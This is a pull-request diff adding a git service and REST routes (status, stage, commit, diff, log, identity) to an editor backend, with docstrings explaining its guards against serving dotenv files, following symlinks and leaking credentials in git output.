### PR TITLE
feat(git): the Source Control backend — a non-interactive git service and the status, stage, commit, init, diff and log routes

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -22,6 +22,44 @@ received — each links to the release it was published as.
 
 ## [Unreleased]
 
+### Added
+
+- **Source control from the editor, part 1 — the git service and the read and
+  commit routes.** `/api/git` runs the host's own `git`, with the host's own
+  credentials, against the open project directory and nothing else — never the
+  CodefyUI checkout, and never a repository the project happens to sit inside,
+  which is reported as its own state rather than quietly operated on. Every
+  call is non-interactive: a missing credential comes back as a fast, named
+  error instead of a server hung on a password prompt nobody can see. Every
+  path, ref, name and message is checked against a closed grammar before it
+  reaches an argument list, and there is no shell in between. This first part
+  ships status, stage / unstage / discard, commit and amend, init (with the
+  same `.gitignore` and `.gitattributes` `cdui project init` writes, whose
+  first line is `.env`), the commit identity and where it is configured, the
+  log, the files of one commit, and diffs; branches, remotes, stashes and the
+  sidebar tab itself follow. A dotenv file is refused at every ref, so a secret
+  committed once is still never served back through an open read, and anything
+  git says on the way out is scanned for a credential — a token inside a remote
+  URL is masked while the host and the path stay, because which remote failed
+  is the half of that sentence worth reading. A path that goes through a
+  symbolic link or a Windows junction is refused rather than followed, in both
+  directions: reading one would serve the file at the other end of it, and
+  discarding one would delete that file. The limit of that guard is worth
+  stating plainly — a hard link is indistinguishable from the file itself, and
+  making one on the server already takes the local write access that would let
+  somebody copy the file anyway. Writing needs the session token every other
+  mutating call needs; reading is open, like every other read in the app.
+
+### Changed
+
+- **`cdui project init` pins `*.json` to LF.** The scaffold's `.gitattributes`
+  gains `*.json text eol=lf`. A project's graphs and layouts are its source,
+  the server writes them with LF endings, and a Windows checkout with
+  `core.autocrlf=true` handed them back as CRLF — so every save rewrote every
+  line, and a one-node change was reviewed as a whole-file diff. An existing
+  `.gitattributes` is never rewritten, so this reaches projects scaffolded from
+  here on.
+
 ## [2.5.0] — 2026-09-01
 
 Twenty-four commits since 2.4.1, around three themes. The Package Center

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -42,13 +42,16 @@ received — each links to the release it was published as.
   git says on the way out is scanned for a credential — a token inside a remote
   URL is masked while the host and the path stay, because which remote failed
   is the half of that sentence worth reading. A path that goes through a
-  symbolic link or a Windows junction is refused rather than followed, in both
-  directions: reading one would serve the file at the other end of it, and
-  discarding one would delete that file. The limit of that guard is worth
-  stating plainly — a hard link is indistinguishable from the file itself, and
-  making one on the server already takes the local write access that would let
-  somebody copy the file anyway. Writing needs the session token every other
-  mutating call needs; reading is open, like every other read in the app.
+  symbolic link or a Windows junction is refused rather than followed —
+  reading one would serve the file at the other end of it, and discarding one
+  would delete that file — and the whole-tree buttons hold to the same rule:
+  they skip whatever a link redirects and say what they skipped, rather than
+  quietly staging a folder that is not part of the project. The limit of that
+  guard is worth stating plainly — a hard link is indistinguishable from the
+  file itself, and making one on the server already takes the local write
+  access that would let somebody copy the file anyway. Writing needs the
+  session token every other mutating call needs; reading is open, like every
+  other read in the app.
 
 ### Changed
 

--- a/backend/app/api/routes_git.py
+++ b/backend/app/api/routes_git.py
@@ -1,0 +1,341 @@
+"""REST surface for the Source Control tab.
+
+    GET    /api/git/status                 the repository, and its status
+    GET    /api/git/log                    one page of history
+    GET    /api/git/commits/{sha}/files    what one commit changed
+    GET    /api/git/diff                   the patch for one file
+    GET    /api/git/file                   one file's content at one ref
+    GET    /api/git/config                 who commits here, and from where
+    POST   /api/git/init                   make the project a repository
+    POST   /api/git/stage /unstage /discard
+    POST   /api/git/commit
+    PUT    /api/git/config                 write user.name / user.email
+
+Every route is three lines long, and that is the design rather than an
+accident: the service on ``app.state`` owns the repository, the lock, the
+worker threads and every decision about what git may be asked. What is left
+here is the four things that only exist once there is a REQUEST in front of
+one.
+
+* **Auth is the house rule and nothing else.** ``auth_guard`` in ``main.py``
+  requires the session token for every mutating ``/api/`` call, so the six
+  writes here are covered by being POSTs and PUTs; the reads are open GETs
+  like every other read in the app. This router is deliberately NOT in
+  ``_AUTH_EXEMPT_PREFIXES`` -- an exemption would silently drop
+  authentication from every write, because none of these routes declares a
+  route-level dependency -- and there is no loopback gate either. That was
+  decided: access control for a server somebody deliberately serves to a
+  LAN is the deploying organisation's job (issue #247), and unlike a pack
+  install this runs the user's own git against the directory they opened,
+  with the credentials they already have.
+* **One failure shape, redacted once.** Every ``GitError`` becomes an
+  ``HTTPException`` with a dict ``detail`` carrying ``code`` (the closed
+  vocabulary the frontend translates), ``message``, ``hint`` and ``stderr``
+  -- through :func:`_http_error` and nowhere else, because that function is
+  also where :func:`~app.core.git.errors.redact` runs. git's stderr can hold
+  a credential (``https://user:ghp_xxx@github.com/...`` is a URL somebody
+  really does paste into ``git remote add``), and a route that built its own
+  envelope would be the one that leaked it. Nothing here logs ``.stderr`` at
+  all: the tail travels in the response, redacted, and there is no second
+  copy of it to get wrong.
+* **A missing service is a 503, not a traceback.** The lifespan builds the
+  service; a test client does not run the lifespan, and a server whose
+  startup failed has no repository to talk about either.
+* **What the query string may say is a closed set.** ``limit`` is 1..100 and
+  ``scope`` is one of three words, both enforced by the signature, so an
+  out-of-range page is a 422 before any code here runs. Everything with a
+  meaning -- a path, a ref, a sha, a message -- is validated by
+  ``core/git/paths.py`` instead, which answers with a ``code`` the frontend
+  can translate rather than with pydantic's English.
+"""
+
+from __future__ import annotations
+
+from collections.abc import Awaitable
+from typing import Literal, TypeVar
+
+from fastapi import APIRouter, HTTPException, Query, Request
+
+from ..core.git.errors import GitBusy, GitError, redact
+from ..core.git.models import (
+    CommitRequest,
+    DiffResponse,
+    FileAtRef,
+    GitFile,
+    Identity,
+    IdentityRequest,
+    LogResponse,
+    MutationResult,
+    PathsRequest,
+    StatusResponse,
+)
+from ..core.git.service import GitService
+
+router = APIRouter(prefix="/api/git", tags=["git"])
+
+_T = TypeVar("_T")
+
+#: The three things a diff can be about, as the wire spells them. Declared
+#: as a ``Literal`` so a fourth word is a 422 from the signature rather than
+#: a string this module has to check.
+DiffScope = Literal["worktree", "index", "commit"]
+
+#: How many commits one page of the history holds by default, and the most
+#: it may hold. The cap is not about the server -- ``git log`` is cheap --
+#: but about the tab: a page is a scroll position, and a client asking for
+#: ten thousand commits has a paging bug, not a big repository.
+DEFAULT_LOG_LIMIT = 30
+MAX_LOG_LIMIT = 100
+
+#: What a request gets when the lifespan never built a service. Deliberately
+#: NOT a member of ``errors.CODES``: that table is the vocabulary of things
+#: GIT can fail at, and this is the server failing to have started -- the
+#: same distinction that keeps ``no_project`` in it and this out.
+SERVICE_UNAVAILABLE_CODE = "git_service_unavailable"
+
+
+def _http_error(exc: GitError) -> HTTPException:
+    """The ONE place a git failure becomes a response body.
+
+    Four keys, always the same four, because the frontend is typed against
+    them: ``code`` is what it switches on and translates, ``message`` is the
+    English fallback for a log or a developer, ``hint`` is the one fact the
+    code cannot carry (which file, which branch), and ``stderr`` is git's
+    own tail -- kept, because a classification can be wrong and a wrong
+    answer with no evidence under it cannot be argued with.
+
+    ``message`` and ``stderr`` are REDACTED on the way out, and ``hint``
+    with them: a credential can only reach a client through one of those
+    three strings, and putting the call in one place is what makes "no token
+    is ever serialised" a property of the code rather than of every handler
+    remembering. Nothing is logged here -- the redacted tail is in the
+    response, and a second copy in a log file is a second thing to get
+    wrong.
+
+    ``busy`` additionally carries ``op``, the operation that holds the lock,
+    so the tab can say "wait for the commit" rather than "wait". It is the
+    only code with a fifth key, and an extra key is what a client that does
+    not know about it ignores.
+    """
+    detail: dict[str, object] = {
+        "code": exc.code,
+        "message": redact(exc.message),
+        "hint": redact(exc.hint) if exc.hint else exc.hint,
+        "stderr": redact(exc.stderr) if exc.stderr else exc.stderr,
+    }
+    if isinstance(exc, GitBusy):
+        detail["op"] = exc.op
+    return HTTPException(status_code=exc.status, detail=detail)
+
+
+def _service(request: Request) -> GitService:
+    """The service the lifespan built, or 503.
+
+    Optional on ``app.state`` for the same reason every other store is: the
+    lifespan does not run under httpx's ASGITransport, so a test reaches
+    these routes with nothing there unless it installs one.
+    """
+    service = getattr(request.app.state, "git_service", None)
+    if service is None:
+        raise _http_error(GitError(
+            SERVICE_UNAVAILABLE_CODE, 503,
+            "source control is not available on this server",
+            hint="the server started without it; restart the server"))
+    return service
+
+
+async def _answer(call: Awaitable[_T]) -> _T:
+    """Await one service call, turning its failure into the envelope.
+
+    Takes the coroutine rather than wrapping the route, so the mapping is a
+    single expression at every call site and FastAPI still sees the real
+    signature of every handler (a decorator that hid one would take the
+    query-parameter validation above with it).
+    """
+    try:
+        return await call
+    except GitError as exc:
+        raise _http_error(exc) from None
+
+
+# --- reads ------------------------------------------------------------------
+
+
+@router.get("/status")
+async def read_status(request: Request) -> StatusResponse:
+    """The repository, and its status when there is one to read.
+
+    ALWAYS a 200 for a repository that is not there: no project open, no
+    git installed, a directory that is not a repository and one that sits
+    inside somebody else's are states the tab draws a screen for, not
+    failures it reports. ``status`` is null beside them.
+    """
+    return await _answer(_service(request).status())
+
+
+@router.get("/log")
+async def read_log(
+    request: Request,
+    skip: int = Query(0, ge=0),
+    limit: int = Query(DEFAULT_LOG_LIMIT, ge=1, le=MAX_LOG_LIMIT),
+) -> LogResponse:
+    """One page of history, newest first.
+
+    ``has_more`` comes from asking git for one commit more than the page
+    and dropping it, so "is there another page" costs nothing extra and an
+    unborn branch answers with an empty page rather than an error.
+    """
+    return await _answer(_service(request).log(skip=skip, limit=limit))
+
+
+@router.get("/commits/{sha}/files")
+async def read_commit_files(request: Request, sha: str) -> list[GitFile]:
+    """The files one commit changed, against its first parent."""
+    return await _answer(_service(request).commit_files(sha))
+
+
+@router.get("/diff")
+async def read_diff(
+    request: Request,
+    path: str,
+    scope: DiffScope,
+    sha: str | None = None,
+    blobs: bool = False,
+) -> DiffResponse:
+    """The patch for one file, in one of the three scopes.
+
+    ``blobs=1`` additionally fills both sides in full, for a side-by-side
+    view. It costs two more reads of the repository, so it is off unless
+    asked for.
+    """
+    service = _service(request)
+    commit = _commit_for_scope(scope, sha)
+    return await _answer(service.diff(path, scope, sha=commit, blobs=blobs))
+
+
+def _commit_for_scope(scope: str, sha: str | None) -> str | None:
+    """The commit a diff is about, when its scope has one.
+
+    An EMPTY ``sha`` counts as an absent one. The tab builds this query
+    string from one form whose fields are always present, so ``sha=`` is
+    what "no commit" looks like on the wire, and reading it as a commit id
+    would turn every worktree diff into a 400.
+
+    Both directions are refused, because they are both a client bug and the
+    silent readings are worse than a 400: a commit diff without a commit
+    would be answered by the layer below with the same code but no hint,
+    and a worktree diff carrying a sha would quietly ignore it and show the
+    user a diff of something else.
+    """
+    commit = sha or None
+    if scope == "commit" and commit is None:
+        raise _http_error(GitError(
+            "invalid_value", 400,
+            "a commit diff needs the commit it is about",
+            hint="pass sha=<commit> with scope=commit"))
+    if scope != "commit" and commit is not None:
+        raise _http_error(GitError(
+            "invalid_value", 400,
+            f"a {scope} diff is not about one commit",
+            hint="drop sha, or ask for scope=commit"))
+    return commit
+
+
+@router.get("/file")
+async def read_file(request: Request, path: str, ref: str) -> FileAtRef:
+    """One file's content at ``HEAD``, ``index``, ``worktree`` or a sha.
+
+    A dotenv file is refused at every ref (403 ``ignored``), and so is an
+    ignored file read from the worktree: ``.gitignore`` is where a project
+    says which files are not part of it, and an open GET that served them
+    anyway would make that promise worthless.
+    """
+    return await _answer(_service(request).file_at_ref(path, ref))
+
+
+@router.get("/config")
+async def read_config(request: Request) -> Identity:
+    """``user.name`` / ``user.email``, and which config file each came from.
+
+    The scope is half the answer: it is the difference between "this
+    repository" and "every repository on this machine", and the tab shows it
+    before it offers to commit.
+    """
+    return await _answer(_service(request).identity())
+
+
+# --- writes (the session token, via auth_guard) -----------------------------
+
+
+@router.post("/init")
+async def init_repository(request: Request) -> MutationResult:
+    """Make the project directory a repository, with the shared scaffold.
+
+    No body, and one is ignored if sent: there is nothing to choose. The
+    scaffold gives a new repository the same ``.gitignore`` and
+    ``.gitattributes`` ``cdui project init`` writes -- the first line of
+    which is ``.env``, because a repository that does not ignore it will
+    sooner or later have the user's API keys in its history, where no later
+    ``.gitignore`` can reach them.
+    """
+    return await _answer(_service(request).init())
+
+
+@router.post("/stage")
+async def stage(request: Request, payload: PathsRequest) -> MutationResult:
+    """Stage the named paths, or the whole tree with ``all``."""
+    service = _service(request)
+    return await _answer(service.stage(payload.paths, all_paths=payload.all))
+
+
+@router.post("/unstage")
+async def unstage(request: Request, payload: PathsRequest) -> MutationResult:
+    """Take the named paths, or everything, back out of the index."""
+    service = _service(request)
+    return await _answer(service.unstage(payload.paths, all_paths=payload.all))
+
+
+@router.post("/discard")
+async def discard(request: Request, payload: PathsRequest) -> MutationResult:
+    """Throw away working-tree changes. The one write that destroys.
+
+    A tracked file is restored from the index and an untracked one is
+    deleted, which is the only thing "discard" can mean for a file that has
+    no other copy. Ignored files are never touched.
+    """
+    service = _service(request)
+    return await _answer(service.discard(payload.paths, all_paths=payload.all))
+
+
+@router.post("/commit")
+async def commit(request: Request, payload: CommitRequest) -> MutationResult:
+    """Commit the index, or the whole tree with ``all``; ``amend`` replaces.
+
+    ``detail.sha`` and ``detail.short`` name the commit this made, so the
+    tab can link to it without reading the log again.
+    """
+    service = _service(request)
+    return await _answer(service.commit(payload.message, all_paths=payload.all,
+                                        amend=payload.amend))
+
+
+@router.put("/config")
+async def write_config(request: Request, payload: IdentityRequest) -> Identity:
+    """Write ``user.name`` / ``user.email`` into THIS repository.
+
+    Always ``--local``: writing the machine's global config from a web
+    request would change every repository on it, including ones this app has
+    never been pointed at.
+
+    Answers with the identity as it now READS -- which is not the same thing
+    as what was written. A name written locally can still be read back with
+    a different scope beside it (the email may remain global), and that pair
+    is what the tab shows before it lets a commit be made.
+    """
+    service = _service(request)
+    if payload.name is None and payload.email is None:
+        raise _http_error(GitError(
+            "invalid_value", 400, "send a name, an email, or both",
+            hint="an identity write with neither would change nothing"))
+    await _answer(service.set_identity(payload.name, payload.email))
+    return await _answer(service.identity())

--- a/backend/app/api/routes_git.py
+++ b/backend/app/api/routes_git.py
@@ -41,12 +41,14 @@ one.
 * **A missing service is a 503, not a traceback.** The lifespan builds the
   service; a test client does not run the lifespan, and a server whose
   startup failed has no repository to talk about either.
-* **What the query string may say is a closed set.** ``limit`` is 1..100 and
-  ``scope`` is one of three words, both enforced by the signature, so an
-  out-of-range page is a 422 before any code here runs. Everything with a
-  meaning -- a path, a ref, a sha, a message -- is validated by
-  ``core/git/paths.py`` instead, which answers with a ``code`` the frontend
-  can translate rather than with pydantic's English.
+* **What the query string may say is a closed set.** ``limit`` is 1..100,
+  ``skip`` is 0..2**31-1 (git's own parser stops there, and one past it is
+  a failure rather than an empty page) and ``scope`` is one of three words
+  -- all three enforced by the signature, so an out-of-range page is a 422
+  before any code here runs. Everything with a meaning -- a path, a ref, a
+  sha, a message -- is validated by ``core/git/paths.py`` instead, which
+  answers with a ``code`` the frontend can translate rather than with
+  pydantic's English.
 """
 
 from __future__ import annotations
@@ -57,6 +59,7 @@ from typing import Literal, TypeVar
 from fastapi import APIRouter, HTTPException, Query, Request
 
 from ..core.git.errors import GitBusy, GitError, redact
+from ..core.git.log import DEFAULT_LOG_LIMIT, MAX_LOG_LIMIT
 from ..core.git.models import (
     CommitRequest,
     DiffResponse,
@@ -80,12 +83,12 @@ _T = TypeVar("_T")
 #: a string this module has to check.
 DiffScope = Literal["worktree", "index", "commit"]
 
-#: How many commits one page of the history holds by default, and the most
-#: it may hold. The cap is not about the server -- ``git log`` is cheap --
-#: but about the tab: a page is a scroll position, and a client asking for
-#: ten thousand commits has a paging bug, not a big repository.
-DEFAULT_LOG_LIMIT = 30
-MAX_LOG_LIMIT = 100
+#: The largest ``skip`` git will take. ``--skip=`` is parsed as a signed
+#: 32-bit integer, and one past it is not "an empty page" but a failure:
+#: ``fatal: '2147483648': not an integer``, exit 128 (measured on git 2.53),
+#: which reached the browser as a 500 from a GET that needs no token.
+#: Bounded in the signature, so it is a 422 before a process starts.
+MAX_LOG_SKIP = 2**31 - 1
 
 #: What a request gets when the lifespan never built a service. Deliberately
 #: NOT a member of ``errors.CODES``: that table is the vocabulary of things
@@ -176,7 +179,7 @@ async def read_status(request: Request) -> StatusResponse:
 @router.get("/log")
 async def read_log(
     request: Request,
-    skip: int = Query(0, ge=0),
+    skip: int = Query(0, ge=0, le=MAX_LOG_SKIP),
     limit: int = Query(DEFAULT_LOG_LIMIT, ge=1, le=MAX_LOG_LIMIT),
 ) -> LogResponse:
     """One page of history, newest first.
@@ -184,6 +187,10 @@ async def read_log(
     ``has_more`` comes from asking git for one commit more than the page
     and dropping it, so "is there another page" costs nothing extra and an
     unborn branch answers with an empty page rather than an error.
+
+    Both numbers are bounded here: a page past the end of the history is an
+    empty page, but a ``skip`` past what git's own parser accepts is a
+    failure with nothing to say to the user.
     """
     return await _answer(_service(request).log(skip=skip, limit=limit))
 

--- a/backend/app/core/git/__init__.py
+++ b/backend/app/core/git/__init__.py
@@ -1,0 +1,20 @@
+"""Source Control: run the host's own git against the open project directory.
+
+The tab in the editor is a front end for the git the user already has, with
+the credentials they already have -- this app stores no tokens and knows no
+remote. What it adds is a boundary: one process spawner (``runner``), one
+error vocabulary (``errors``), one set of closed grammars for everything the
+browser is allowed to name (``paths``), and above them the service and
+routes that decide what a request may ask for.
+
+Only the two exception types are re-exported here. ``errors`` is stdlib-only,
+so catching a git failure -- which any caller may want to do -- never drags
+``subprocess`` or the runner's caches in with it, the same promise
+``app.core.packs`` makes for pack installs.
+"""
+
+from __future__ import annotations
+
+from .errors import GitBusy, GitError
+
+__all__ = ["GitBusy", "GitError"]

--- a/backend/app/core/git/__init__.py
+++ b/backend/app/core/git/__init__.py
@@ -4,8 +4,9 @@ The tab in the editor is a front end for the git the user already has, with
 the credentials they already have -- this app stores no tokens and knows no
 remote. What it adds is a boundary: one process spawner (``runner``), one
 error vocabulary (``errors``), one set of closed grammars for everything the
-browser is allowed to name (``paths``), and above them the service and
-routes that decide what a request may ask for.
+browser is allowed to name (``paths``), one set of wire shapes (``models``),
+one parser for the format all of it turns on (``status``), and above them the
+service and routes that decide what a request may ask for.
 
 Only the two exception types are re-exported here. ``errors`` is stdlib-only,
 so catching a git failure -- which any caller may want to do -- never drags

--- a/backend/app/core/git/diff.py
+++ b/backend/app/core/git/diff.py
@@ -44,11 +44,11 @@ from .models import DiffResponse, FileAtRef, GitStatus
 from .paths import is_env_secret_path, validate_rel_path, validate_sha
 from .repo import (
     GITLINK_MODE,
-    first_parent,
+    SUBMODULE_HINT,
+    commit_trees,
     index_entries,
     path_redirects,
     read_status,
-    resolve_commit,
 )
 from .runner import T_READ, run_git
 
@@ -96,10 +96,6 @@ ONE_FILE_HINT = "diff one file at a time"
 #: What to tell somebody whose path goes through a link. The tab reads files
 #: of the project, and a link is a path to somewhere else.
 LINK_HINT = "symbolic links are not served"
-
-#: The same sentence ``discard`` uses, so one refusal is one answer.
-SUBMODULE_HINT = ("submodules are not managed here; open that repository "
-                  "instead")
 
 #: ``cat-file`` on the stage-0 entry of an UNMERGED path: "fatal: path
 #: 'a.txt' is in the index, but not at stage 0" (measured on git 2.53).
@@ -249,10 +245,8 @@ def _plan(root: Path, path: str, scope: str, sha: str | None) -> _Plan:
     # ``diff-tree`` to one parent (git 2.53 prints one patch per parent), so
     # the tab would show the same file twice with two different diffs. A
     # root commit has no parent and is diffed against the empty tree.
-    commit = resolve_commit(root, sha)
-    parent = first_parent(root, commit)
+    commit, parent, trees = commit_trees(root, sha)
     _require_one_blob(root, path, commit, parent)
-    trees = [parent, commit] if parent is not None else ["--root", commit]
     return _Plan(["diff-tree", "-M", "-p", "--no-color", "--no-ext-diff",
                   "--no-commit-id", *trees, "--", path],
                  f"{commit}^" if parent is not None else None,

--- a/backend/app/core/git/diff.py
+++ b/backend/app/core/git/diff.py
@@ -39,7 +39,13 @@ from pathlib import Path
 from .errors import GitError, classify_failure
 from .models import DiffResponse, FileAtRef, GitStatus
 from .paths import is_env_secret_path, validate_rel_path, validate_sha
-from .repo import first_parent, read_status, resolve_commit
+from .repo import (
+    GITLINK_MODE,
+    first_parent,
+    index_entries,
+    read_status,
+    resolve_commit,
+)
 from .runner import T_READ, run_git
 
 #: The most patch text one response carries. A diff past a megabyte is not
@@ -74,6 +80,9 @@ _BINARY_MARKER = "Binary files "
 #: spells them.
 BLOB = "blob"
 TREE = "tree"
+#: What ``cat-file -t`` calls a gitlink: the object a submodule's entry
+#: points at is a COMMIT, of another repository.
+GITLINK = "commit"
 
 #: What to tell somebody who asked for a directory. One sentence, used by
 #: every refusal that means "that is not a file", so the three of them
@@ -83,6 +92,16 @@ ONE_FILE_HINT = "diff one file at a time"
 #: What to tell somebody whose path goes through a link. The tab reads files
 #: of the project, and a link is a path to somewhere else.
 LINK_HINT = "symbolic links are not served"
+
+#: The same sentence ``discard`` uses, so one refusal is one answer.
+SUBMODULE_HINT = ("submodules are not managed here; open that repository "
+                  "instead")
+
+#: ``cat-file`` on the stage-0 entry of an UNMERGED path: "fatal: path
+#: 'a.txt' is in the index, but not at stage 0" (measured on git 2.53).
+#: There is no single "index version" of a file in a conflict -- there are
+#: three -- so this is a state to report, not an object that is missing.
+_UNMERGED_PHRASE = "but not at stage 0"
 
 #: ``cat-file blob`` on a path that is a TREE at that ref: "fatal: git
 #: cat-file HEAD:sub: bad file" (measured on git 2.53). The object is there
@@ -192,6 +211,14 @@ def _plan(root: Path, path: str, scope: str, sha: str | None) -> _Plan:
     name, and git answered about a tree.
     """
     if scope in ("worktree", "index"):
+        if scope == "worktree":
+            # BEFORE any git call. This scope reads the file on disk -- the
+            # ``--no-index`` branch below hands the whole file back, and the
+            # tracked branch reads it to diff it -- so a path that goes
+            # through a link or a junction must be refused here as well as
+            # in ``file_at_ref``. The index scope compares two trees and
+            # never touches the working copy.
+            _refuse_a_link(root, path)
         status = read_status(root)
         _require_one_file(root, path, status, scope=scope)
         # An UNTRACKED file has no index side, and ``git diff`` says nothing
@@ -261,21 +288,40 @@ def _require_one_file(root: Path, path: str, status: GitStatus, *,
         raise GitError("invalid_path", 400,
                        f"{path} is a directory on one side of this diff",
                        hint=ONE_FILE_HINT)
+    if GITLINK in (head_kind, index_kind):
+        raise _submodule_error(path)
 
     if index_kind is None:
-        # A blob in HEAD does not settle it. The INDEX cannot answer "tree"
-        # -- ``:0:<dir>`` is not an object -- so a directory there looks
-        # like nothing at all until its entries are asked for by name, and
-        # the pathspec would still match every one of them. This is the
-        # mirror of the case above: a file in HEAD, a folder staged over it.
-        result = run_git(["ls-files", "-z", "--", path], cwd=root,
-                         timeout=T_READ, read_only=True)
-        if [name for name in result.out.split("\x00") if name]:
+        # A blob in HEAD does not settle it, and neither does nothing at
+        # all. The INDEX cannot answer "tree" -- ``:0:<dir>`` is not an
+        # object -- so a directory there looks like nothing until its
+        # entries are asked for by name, while the pathspec would match
+        # every one of them.
+        #
+        # The comparison is a SET, because an UNMERGED path is listed once
+        # per stage: three entries, all called ``a.txt``, which is one file
+        # in a conflict and not a directory. Refusing that was a regression
+        # -- a conflicted file is the one a user most wants to look at.
+        entries = index_entries(root, [path])
+        names = {name for _, name in entries}
+        if any(mode == GITLINK_MODE for mode, _ in entries):
+            raise _submodule_error(path)
+        if names and names != {path}:
             raise GitError("invalid_path", 400,
                            f"{path} is a directory in the index",
                            hint=ONE_FILE_HINT)
-        if head_kind is None:
+        if not names and head_kind is None:
             raise GitError("not_found", 404, f"git does not know {path}")
+
+
+def _submodule_error(path: str) -> GitError:
+    """A gitlink is not a file: what is at that path is another repository.
+
+    Refused the same way ``discard`` refuses one, and for the same reason --
+    every answer the tab could give would be about the wrong repository.
+    """
+    return GitError("invalid_path", 400, f"{path} is a submodule",
+                    hint=SUBMODULE_HINT)
 
 
 def _require_one_blob(root: Path, path: str, commit: str,
@@ -300,6 +346,8 @@ def _require_one_blob(root: Path, path: str, commit: str,
         raise GitError("invalid_path", 400,
                        f"{path} is a directory in {commit[:7]} or its parent",
                        hint=ONE_FILE_HINT)
+    if GITLINK in kinds:
+        raise _submodule_error(path)
     if BLOB in kinds:
         return
     raise GitError("not_found", 404, f"no {path} in {commit[:7]}")
@@ -393,6 +441,13 @@ def _from_object(root: Path, spec: str) -> FileAtRef:
                      ok_codes=(0, 128), read_only=True)
     if result.returncode != 0:
         message = result.err.lower()
+        # A conflict is a STATE, not a missing object: the index holds three
+        # versions of this path and no stage-0 one, so "the index version"
+        # is a question with no answer until the conflict is resolved.
+        if _UNMERGED_PHRASE in message:
+            raise GitError("conflict", 409, f"{spec} is in a conflict",
+                           hint="resolve the conflict first",
+                           stderr=result.err.strip())
         # Checked first: something IS there and it is not a file, which is
         # the caller's mistake (a 400) rather than a missing object (404).
         if _NOT_A_BLOB_PHRASE in message:

--- a/backend/app/core/git/diff.py
+++ b/backend/app/core/git/diff.py
@@ -511,10 +511,15 @@ def _from_worktree(root: Path, path: str) -> FileAtRef:
     # QUESTION and returns no content, and the read below is a plain
     # filesystem read of the literal path -- so a pattern cannot make this
     # hand back another file, only refuse one that would have 404'd on the
-    # next line. And pathspec MAGIC cannot reach it at all: every form of it
-    # (``:(glob)``, ``:!``, ``:/``) begins with a colon, and
-    # ``validate_rel_path`` refuses a colon anywhere in a path. That rule
-    # must not be relaxed while this exemption exists.
+    # next line.
+    #
+    # And pathspec MAGIC cannot reach it at all: every form of it
+    # (``:(glob)``, ``:!``, ``:/``, ``:(icase)``) begins with a COLON, and
+    # ``validate_rel_path`` refuses a colon anywhere in a path -- which
+    # ``_readable_path`` has already run on this string, several lines above
+    # this call, before anything was decided about it. That colon rule is
+    # what makes this exemption safe, not only a Windows alternate-data-
+    # stream defence, and it must not be relaxed while the exemption exists.
     ignored = run_git(["check-ignore", "-q", "--", path], cwd=root,
                       timeout=T_READ, ok_codes=(0, 1), read_only=True,
                       literal_pathspecs=False)

--- a/backend/app/core/git/diff.py
+++ b/backend/app/core/git/diff.py
@@ -32,6 +32,7 @@ never typed and this process would then wait for.
 
 from __future__ import annotations
 
+import os
 from dataclasses import dataclass
 from pathlib import Path
 
@@ -68,6 +69,26 @@ DEV_NULL = "/dev/null"
 
 #: git's way of saying there is no patch to show.
 _BINARY_MARKER = "Binary files "
+
+#: The two object types this module has an opinion about, as ``cat-file -t``
+#: spells them.
+BLOB = "blob"
+TREE = "tree"
+
+#: What to tell somebody who asked for a directory. One sentence, used by
+#: every refusal that means "that is not a file", so the three of them
+#: cannot drift apart.
+ONE_FILE_HINT = "diff one file at a time"
+
+#: What to tell somebody whose path goes through a link. The tab reads files
+#: of the project, and a link is a path to somewhere else.
+LINK_HINT = "symbolic links are not served"
+
+#: ``cat-file blob`` on a path that is a TREE at that ref: "fatal: git
+#: cat-file HEAD:sub: bad file" (measured on git 2.53). The object is there
+#: and is not a file, which is a different answer from "there is nothing
+#: here" -- a 400 rather than a 404.
+_NOT_A_BLOB_PHRASE = ": bad file"
 
 #: What ``cat-file`` says when the blob is not there. Anything else that
 #: exits 128 is a repository problem, not a missing file, and is classified
@@ -172,7 +193,7 @@ def _plan(root: Path, path: str, scope: str, sha: str | None) -> _Plan:
     """
     if scope in ("worktree", "index"):
         status = read_status(root)
-        _require_one_file(root, path, status)
+        _require_one_file(root, path, status, scope=scope)
         # An UNTRACKED file has no index side, and ``git diff`` says nothing
         # at all about one -- an empty patch for a file the user can see is
         # the most confusing possible answer. ``--no-index`` against
@@ -207,63 +228,80 @@ def _plan(root: Path, path: str, scope: str, sha: str | None) -> _Plan:
                  commit, parent, commit)
 
 
-def _require_one_file(root: Path, path: str, status: GitStatus) -> None:
-    """Refuse anything that is not exactly one file of this repository.
+def _require_one_file(root: Path, path: str, status: GitStatus, *,
+                      scope: str) -> None:
+    """Refuse anything that is not one FILE on both sides of this diff.
 
-    A pathspec that names a DIRECTORY is a diff of everything under it, so
-    ``sub`` would answer with ``sub/.env`` -- the guard would have checked
-    the string ``sub`` and git would have opened somebody's secrets. The
-    same is true of a name that only LOOKS like a directory to the index (a
-    tree, a path that is gone from disk but still has entries under it).
+    A pathspec that names a directory diffs everything under it, so ``sub``
+    would answer with ``sub/.env``: the guard would have checked the string
+    ``sub`` and git would have opened somebody's secrets. Being a file in
+    one place is not enough, because the two sides of a diff are two
+    different trees -- a path can be a plain file in the index and a
+    DIRECTORY in HEAD (delete ``sub/``, write a file called ``sub``, stage
+    it), and ``diff --cached -- sub`` then prints the removal of everything
+    that used to be under it, ``sub/.env`` included. Measured on git 2.53;
+    it is the reason this asks both sides rather than one.
 
-    Three answers, in the order that gives the most useful one first: a
-    directory on disk is a 400 that says to ask for one file; a path the
-    status already lists is a file by construction (``--untracked-files=all``
-    lists files, never the folders they are in); anything else is asked of
-    the index, where matching exactly itself means a tracked file, matching
-    something else means a tree, and matching nothing means there is nothing
-    to diff.
+    So: an untracked path is a file by construction (git lists files, never
+    the folders they are in, and it is in neither tree); a directory on disk
+    ends a worktree diff; and otherwise both sides are asked what they hold.
+    A ``tree`` on either side is a 400 -- including the shape the index
+    cannot express as a tree, which is entries UNDER the path and nothing
+    AT it. Only when neither side has anything is it a 404.
     """
-    if (root / path).is_dir():
-        raise GitError("invalid_path", 400, f"{path} is a directory",
-                       hint="diff one file at a time")
-    known = {entry.path
-             for group in (status.staged, status.unstaged, status.untracked,
-                           status.conflicted)
-             for entry in group}
-    if path in known:
+    if path in {entry.path for entry in status.untracked}:
         return
+    if scope == "worktree" and (root / path).is_dir():
+        raise GitError("invalid_path", 400, f"{path} is a directory",
+                       hint=ONE_FILE_HINT)
 
-    result = run_git(["ls-files", "-z", "--", path], cwd=root, timeout=T_READ,
-                     read_only=True)
-    names = [name for name in result.out.split("\x00") if name]
-    if not names:
-        raise GitError("not_found", 404, f"git does not know {path}")
